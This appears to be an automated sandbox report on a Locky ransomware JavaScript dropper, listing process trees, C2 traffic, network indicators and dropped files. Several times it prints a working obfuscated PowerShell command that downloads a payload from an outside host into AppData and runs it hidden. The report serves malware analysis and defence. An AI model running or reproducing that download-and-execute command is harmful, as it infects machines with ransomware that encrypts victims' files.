Pattern match: "http://www.osn.com/app_themes/osn/fonts/icon-osn.eot"
Pattern match: "http://nsis.sf.net/NSIS_Error"
Pattern match: "www.injusticeil.top"
Heuristic match: "community - thamizha.com"
Heuristic match: "ommunity - thamizha.com"
Heuristic match: "ciscobinary.openh264.org"
Pattern match: "http://www.nameboat.com"
Pattern match: "www.nameboat.com"
Pattern match: "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"
Pattern match: "https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css"
Pattern match: "https://fonts.googleapis.com/css?family=Lato:400,700,900,100,300"
Pattern match: "https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"
Pattern match: "https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"
Pattern match: "www.google-analytics.com/analytics.js','ga"
Pattern match: "http://www.efty.com/market/odf/js/odf.js"
Pattern match: "http://www.nameboat.com/ajax/market_themes/domain_overview_tiles/filters/'+form_values_for_url+'/user_id/1293/offset/10/keyword//"
Pattern match: "http://www.nameboat.com/ajax/market_themes/domain_overview_tiles/filters/'+form_values_for_url+'/user_id/1293/offset/init/keyword//"
Pattern match: "https://www.facebook.com/NameBoat-1778675352414159/"
Pattern match: "http://www.efty.com/"
Pattern match: "http://www.pyload-security.com/download.php?file=Desktop%20background.png,ID:4,docshellID:5,docIdentifier:4},{url:https://www.payload-security.com/download.php?file=Desktop%2520background.png,ID:5,docshellID:5,docIdentifier:5}],lastAccess"
Pattern match: "http://en.wikipedia.org/wiki/RSA_(cryptosystem)"
Pattern match: "http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe"
Pattern match: "http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe"
Pattern match: "https://www.torproje_.or9/download/download-easy.html" - source
- String
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "<li><a href="https://www.facebook.com/NameBoat-1778675352414159/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>" (Indicator: "facebook.com")
- source
- String
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"wscript.exe" opened "\Device\KsecDD"
"helper.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
File Details
BILL_4531.js
- Filename
- BILL_4531.js
- Size
- 24KiB (24923 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- 27c01df7b6de549f6d9e12f9e27601d0e785186c6d29a917419f7ac42822e076
- MD5
- 76fc21ce41c534b94bea7e1a7bce327c
- SHA1
- 8fdc6b79c402011a450bc522f5daa3cac9e147f1
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 8 processes in total (System Resource Monitor).
-
wscript.exe
"C:\BILL_4531.js"
(PID: 1264)
-
cmd.exe
/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe
(PID: 2356)
-
powershell.exe
poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe
(PID: 2360)
-
eXe
(PID: 2708)
-
eXe
(PID: 2696)
-
firefox.exe
-osint -url "%USERPROFILE%\Desktop\_HOWDO_text.html"
(PID: 2760)
- helper.exe /SetAsDefaultAppUser (PID: 600)
- cmd.exe /C del /Q /F "%TEMP%\sysE5A3.tmp" (PID: 1060)
-
firefox.exe
-osint -url "%USERPROFILE%\Desktop\_HOWDO_text.html"
(PID: 2760)
-
eXe
(PID: 2696)
-
eXe
(PID: 2708)
-
powershell.exe
poWersheLL.eXe -eXecUtiOnPoLicY Bypass -nOPROFile -wiNdOwstyLe hidden (New-oBJect SYstem.Net.WeBclIent).dOwnlOadfile('http://www.injusticeil.top/user.php?f=2.dat','%APPDATA%\eXe');start-pROceSs %APPDATA%\eXe
(PID: 2360)
-
cmd.exe
/c p^oWer^sh^eLL.e^Xe ^-^eXecUtiOnPoLi^cY Byp^a^ss^ -^nO^PROFil^e^ -w^iNdOw^sty^Le^ hidd^en^ (New^-oBJect S^Ys^te^m^.^Net^.W^e^Bcl^I^ent).dO^w^nlOadfile(^'http://www.injusticeil.top/user.php?f=2.dat',^'%APPDATA%\eXe');st^art^-p^R^Oc^eSs^ %APPDATA%\eXe
(PID: 2356)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
ciscobinary.openh264.org | 184.50.238.219 | - | United States |
dsybuxulplscgeonv.xyz | - | - | - |
yitmxwhryykuuj.click | - | - | - |
taulmkeuktvxhe.xyz | - | - | - |
tyoycmkymaty.pl | - | - | - |
jhomitevd2abj3fk.onion.to | 185.100.85.150 | - | Romania |
www.injusticeil.top | 172.245.9.41 | - | United States |
udynanrpxqbxrosop.click | - | - | - |
jrhkejh.click | - | - | - |
ovpgfkt.info | - | - | - |
www.torproject.org | 138.201.14.197 | - | Germany |
jbajudsmkrurhnyu.pl | - | - | - |
jdptstkrjiowdqvgi.pw | 208.100.26.234 | - | United States |
jhomitevd2abj3fk.tor2web.org | 38.229.70.4 | - | United States |
en.wikipedia.org | 91.198.174.192 | - | Netherlands |
pccwuntpqx.click | - | - | - |
efympeet.xyz | - | - | - |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
172.245.9.41 |
80
TCP |
powershell.exe PID: 2360 |
United States
ASN: 36352 (ColoCrossing) |
91.200.14.124 |
80
TCP |
roaming.exe PID: 2696 |
Ukraine
ASN: 35804 (PP SKS-Lugan) |
185.102.136.77 |
80
TCP |
roaming.exe PID: 2696 |
Russian Federation |
52.32.150.180 |
443
TCP |
firefox.exe PID: 2760 |
United States |
52.84.13.157 |
443
TCP |
firefox.exe PID: 2760 |
United States |
192.122.185.121 |
443
TCP |
firefox.exe PID: 2760 |
United States
ASN: 237 (Merit Network Inc.) |
192.122.185.123 |
443
TCP |
firefox.exe PID: 2760 |
United States
ASN: 237 (Merit Network Inc.) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
172.245.9.41:80 (www.injusticeil.top) | GET | www.injusticeil.top/user.php?f=2.dat | GET /user.php?f=2.dat HTTP/1.1 Host: www.injusticeil.top Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
185.102.136.77:80 | POST | 185.102.136.77/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://185.102.136.77/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.102.136.77 Content-Length: 561 Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
185.102.136.77:80 | POST | 185.102.136.77/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://185.102.136.77/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 185.102.136.77 Content-Length: 561 Connection: Keep-Alive |
91.200.14.124:80 | POST | 91.200.14.124/apache_handler.php | POST /apache_handler.php HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.200.14.124/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.200.14.124 Content-Length: 561 Connection: Keep-Alive |
184.50.238.219:80 (ciscobinary.openh264.org) | GET | ciscobinary.openh264.org/openh264-win32-v1.3.zip | GET /openh264-win32-v1.3.zip HTTP/1.1 Host: ciscobinary.openh264.org User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Connection: keep-alive |
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://nsis.sf.net/nsis_error | Domain/IP reference | 00037821-00000600-47529-60-0040311B |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile | 2016778 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (tor2web) | 2015576 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (onion.to) | 2020116 |
local -> 8.8.8.8:53 (UDP) | A Network Trojan was detected | ET TROJAN ABUSE.CH Locky Payment Domain Detected | 2023329 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to .onion proxy Domain (tor2web) | 2015576 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 M2 | 2821569 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Ransomware Locky CnC Beacon Oct 3 | 2822473 |
local -> 91.200.14.124:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
local -> 185.102.136.77:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Locky CnC checkin Aug 03 2016 | 2821471 |
Extracted Strings
Extracted Files
Displaying 25 extracted file(s). The remaining 211 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
gmpopenh264.dll
- Size
- 604KiB (617984 bytes)
- Type
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result
- 0/80
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- fa0e6fec79fa41c6744e1e03a1401154
- SHA1
- 6f5828d27b710057ade7849ebe5eccf204540c28
- SHA256
- f2a7b0ef96f80d6fef9e64bf685edd6e6718cc3f40c829cc3845c8afd929a546
-
-
Informative 24
-
-
nav.css
- Size
- 5.4KiB (5555 bytes)
- Type
- ASCII text
- Runtime Process
- eXe (PID: 2708)
- MD5
- b873ad63e8cfade1bad4f02857f0748d
- SHA1
- 7dfdb08c95b78bdde77a008711e94e8c1973bcc5
- SHA256
- c602d361f3a7810acb5f6dc740457f2e8974c60a2eafdbbc741238a08b0c137f
-
5DYGW9JJ-XIPQ-SEFB-D62E-8CABDDA95F33.odin
- Size
- 49KiB (50044 bytes)
- Type
- data
- MD5
- 5508a2a86bf72fb5485b5be36c1573cc
- SHA1
- 84a5c7eec4ea38f45bcc5ad31f2c4ea52be02be3
- SHA256
- 08091e1a22e91bf80a9e90c7b719e7c69035f4445d016cc7d5c56d28695ea033
-
_28_HOWDO_text.html
- Size
- 9.3KiB (9482 bytes)
- Type
- HTML document, UTF-8 Unicode text, with very long lines
- MD5
- d8f4fac7c57e62bcd93176399fc48af8
- SHA1
- eb169e9921deba92804217164627b66c03808ef8
- SHA256
- 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2
-
5DYGW9JJ-XIPQ-SEFB-7359-764CD16FFCE7.odin
- Size
- 29KiB (29701 bytes)
- Type
- data
- MD5
- d62eb5403afbd99fead0458375b101bb
- SHA1
- 00bb4d5b7d39a54fe78a6dd1eb4871f54b52c26c
- SHA256
- 3aea23f088ab68dcff6792b3a14fd938473f49b8694eae7b5e71193f2c3e1848
-
5DYGW9JJ-XIPQ-SEFB-9716-0A946C3CE4BE.odin
- Size
- 932B (932 bytes)
- Type
- data
- MD5
- 1bd6d4607c36393e637c0c653c19649e
- SHA1
- 8d6068c2b2e8db84d0b6083447653fb52a1856c6
- SHA256
- 9560a9be9d871cb3faca40dc52a3fe246b86892043a1fe62d2308df924f177cd
-
home-&-garden
- Size
- 14KiB (14346 bytes)
- Type
- HTML document, ASCII text, with CRLF line terminators
- Runtime Process
- eXe (PID: 2708)
- MD5
- c6df9f876ad24906f3fc5a0541b5dc82
- SHA1
- eedfeedbe308fa432d7e76836e94a3e614b4671d
- SHA256
- 1193bc37b0fb028631ae898023c1d61dd8578c335b53ca68722a066d856df751
-
_21_HOWDO_text.html
- Size
- 9.3KiB (9482 bytes)
- Type
- HTML document, UTF-8 Unicode text, with very long lines
- MD5
- d8f4fac7c57e62bcd93176399fc48af8
- SHA1
- eb169e9921deba92804217164627b66c03808ef8
- SHA256
- 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2
-
healthreport.sqlite
- Size
- 1.1MiB (1146880 bytes)
- Type
- SQLite 3.x database, user version 1
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- b1be5c2d296473c1f88ed38e4a8b31ba
- SHA1
- b20fe84ab183aa37fd744492a9775a94856a1f7d
- SHA256
- 4ecca893ebd7ef80e7f1fa048148276c989d0fc163c62ced5e2c2a55f479d593
-
5DYGW9JJ-XIPQ-SEFB-4DDE-F004BFD77AEE.odin
- Size
- 3.1KiB (3132 bytes)
- Type
- data
- MD5
- 63df4fe124fa47e6971140f9e3a05109
- SHA1
- e8c57a06ddc2f0beb05b304ce536cf68092450a4
- SHA256
- 50069b9ab8a4267a60939222fe7c5c3f56b9f0cc14e69b732f3e109398fd9afd
-
5DYGW9JJ-XIPQ-SEFB-5AFB-0FF7A6D5EE86.odin
- Size
- 3.9MiB (4114710 bytes)
- Type
- data
- MD5
- e5ea981f09b77336f8a6492c7d65fae1
- SHA1
- 8eb3e4561b441045e25836a2d4a6d7b78ba8db22
- SHA256
- 436e07044bb0042128493fc2f36c8ff1aae3003ffa814ad12f8d9842576e3ce5
-
_22_HOWDO_text.html
- Size
- 9.3KiB (9482 bytes)
- Type
- HTML document, UTF-8 Unicode text, with very long lines
- MD5
- d8f4fac7c57e62bcd93176399fc48af8
- SHA1
- eb169e9921deba92804217164627b66c03808ef8
- SHA256
- 16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2
-
healthreport.sqlite-wal
- Size
- 608KiB (623080 bytes)
- Type
- data
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- 523ac571ef9e02fb2dd7fa3d106e8057
- SHA1
- aa720a4037c44d9f9ea7b9601c692bfc8935fc71
- SHA256
- 1ac76026640eedd02c7b05bcf819e425724b84de4c31c2543d3d659ae26190f0
-
5DA331CF89FC03A9797F848CD51BA54F20015C7D
- Size
- 864B (864 bytes)
- Type
- data
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- 2237d5ee2cb47822c285c501779b4da1
- SHA1
- 6192cc9040dc97393f41160aae90adc526d4e515
- SHA256
- bb07499adf3205db464dbd1b811e29b23b07a4fae2356cd55405fdb706b4560a
-
5DYGW9JJ-XIPQ-SEFB-F034-96B64D825B9A.odin
- Size
- 2.3KiB (2401 bytes)
- Type
- data
- MD5
- eb9a73130f93b4349fadcc3aeafdcf1d
- SHA1
- 915f8fd7bc609b3fd586ee3b1c2455ec8369f2b5
- SHA256
- 0121faa0530d2e0ece2834b25128276f7b7541b0489d173939560950076e19e3
-
recovery.js.tmp
- Size
- 1.8KiB (1844 bytes)
- Type
- ASCII text, with very long lines, with no line terminators
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- 0a45e5e2ce4af5e47e5f66213ef00ae7
- SHA1
- b7aada608e1b050fc10b9faa116aadabc9b8b0a9
- SHA256
- 63fbfac56238ce944e4088db5afe7e929e90868f3eea3b313de0a6a35673a917
-
goog-phish-shavar.pset
- Size
- 436KiB (446550 bytes)
- Type
- data
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- b5ab6cb9f7a70a95b464bb8a9de221bf
- SHA1
- a0be00a1bf4419dc1cd7964db151e096e64fa5f6
- SHA256
- 1c5245ca5048423e50ff76e1ca337a270fa5e662e1ba4b8462cf0d814e462d91
-
5DYGW9JJ-XIPQ-SEFB-7AFD-E18982230556.odin
- Size
- 1.6KiB (1647 bytes)
- Type
- data
- MD5
- 879ea81ecface3d8547b223091f680b9
- SHA1
- 18d3c76ef055509d2e3a35f37da0d06d0b3c0bf4
- SHA256
- 77aef9bbaeeb844572478d475a96f015eeebb425b18a23c7e640b327d19405a2
-
cookies.sqlite-wal
- Size
- 480KiB (491912 bytes)
- Type
- data
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- 356a994babf21f10496b1d3bae2b71a9
- SHA1
- b11ce421050f50a4bc56eefebe10167223dbbd4c
- SHA256
- 5824502610933d6ace0af7b6ca5b44e8093f75e4e61d2f9a8202c8b21633b441
-
6DF4C247EB188DBE3AA7FEFB8B83F5C21339C17F
- Size
- 5.3KiB (5422 bytes)
- Type
- data
- Runtime Process
- firefox.exe (PID: 2760)
- MD5
- 6eeee4ec2efa8027d1af669e70f34860
- SHA1
- 8e4419a9e87aa16e8199bbca47ca02c40ca3cd5b
- SHA256
- caac4934b25e5144adff3243b2f3201312e3078b471d484adfc3e2d328df82f9
-
AppAssocReg.dll
- Size
- 4.5KiB (4608 bytes)
- Runtime Process
- helper.exe (PID: 600)
- MD5
- 1145a8e66064f36640e62e7ed58472bd
- SHA1
- e0416facc56fd30581f15bda522216ba586736ba
- SHA256
- 386c19010f04c04a3a0071cce09f7a2c10393392c7ca5877becc437ad9d31d37
-
CityHash.dll
- Size
- 44KiB (44544 bytes)
- Runtime Process
- helper.exe (PID: 600)
- MD5
- 737379945745bb94f8a0dadcc18cad8d
- SHA1
- 6a1f497b4dc007f5935b66ec83b00e5a394332c6
- SHA256
- d3d7b3d7a7941d66c7f75257be90b12ac76f787af42cd58f019ce0280972598a
-
System.dll
- Size
- 11KiB (11264 bytes)
- Runtime Process
- eXe (PID: 2708)
- MD5
- 959ea64598b9a3e494c00e8fa793be7e
- SHA1
- 40f284a3b92c2f04b1038def79579d4b3d066ee0
- SHA256
- 03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
-
ShellLink.dll
- Size
- 4.5KiB (4608 bytes)
- Runtime Process
- helper.exe (PID: 600)
- MD5
- d62d3e349689811f838dd10fb216eba1
- SHA1
- edcafd517860cb6b4bd299e20b17ad74a6fa2a5d
- SHA256
- 5d103419245e2a5f124a96cace25d6836b2398edc0aa3919829b0fd6ad8b5d6a
-
Roaming.eXe
- Size
- 264KiB (270239 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
- Runtime Process
- powershell.exe (PID: 2360)
- MD5
- 0a155c07ac42cacd00f4aff5b490a9f1
- SHA1
- 8a5fdb34ba36b2a1965ab71d4b09666e06b10702
- SHA256
- 356ce5058314908fd8c2cb86df05e32a0baac6fc775fa93403bf1d9552917220
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Dropped file "Roaming.eXe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/356ce5058314908fd8c2cb86df05e32a0baac6fc775fa93403bf1d9552917220/analysis/1477113583/")
- Dropped file "_28_HOWDO_text.html" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/16552fb073ef206f57e9fba5a65265d9711f966a2c5069256f64843e4abf03a2/analysis/1477113575/")
- Dropped file "home-&-garden" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/1193bc37b0fb028631ae898023c1d61dd8578c335b53ca68722a066d856df751/analysis/1477113576/")
- Not all file accesses are visible for cmd.exe (PID: 1060)
- Not all file accesses are visible for cmd.exe (PID: 2356)
- Not all file accesses are visible for eXe (PID: 2696)
- Not all file accesses are visible for eXe (PID: 2708)
- Not all file accesses are visible for firefox.exe (PID: 2760)
- Not all file accesses are visible for helper.exe (PID: 600)
- Not all file accesses are visible for powershell.exe (PID: 2360)
- Not all file accesses are visible for wscript.exe (PID: 1264)
- Not all sources for signature ID "binary-0" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Parsed the maximum number of dropped files (20), report might not contain information about some dropped files
- Some low-level details are hidden from the report due to oversize